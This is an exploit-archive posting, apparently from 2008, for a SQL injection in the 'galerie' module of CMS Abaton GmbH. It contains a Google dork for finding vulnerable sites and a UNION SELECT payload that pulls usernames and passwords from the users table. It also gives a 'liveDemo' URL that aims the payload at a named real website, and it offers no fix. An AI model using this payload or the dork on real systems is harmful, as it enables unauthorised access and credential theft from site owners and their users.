CMS Abaton GmbH Module galerie (gid) SQL Injection Vulnerability

2008-11-13 20:10:06

########################################################
CMS Abaton GmbH module galerie(gid) SQL injection vuln..
########################################################

######################################################
#[~] Author : boom3rang
#[~] Site: www.khg-crew.ws
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
######################################################
#[!] Module_Name: galerie
#[!] Script_Name: CMS Abaton GmbH
#[!] Home Page: http://www.abaton.at/
#[!] Google_Dork: inurl:"module/galerie/show.php?id=
#[!] Login Page: http://localHost/module/
######################################################

_________________________________________________________________________________________________________________________
[>>] Example:
http://localhost/Path/module/galerie/show.php?id=447&gid= [exploit]
_________________________________________________________________________________________________________________________

[>>] Exploit:
-9999/**/UNION/**/SELECT/**/concat(user,char(58),pass)/**/from/**/users/*
_________________________________________________________________________________________________________________________
[>>] liveDemo:
http://www.hunting-tours.com/module/galerie/show.php?id=447&gid=-9999/**/UNION/**/SELECT/**/concat(user,char(58),pass)/**/from/**/users/*
_________________________________________________________________________________________________________________________

###################################
#[>>] Proud 2 be Albanian
#[>>] Proud 2 be Muslim
#[>>] United States of Albania
###################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.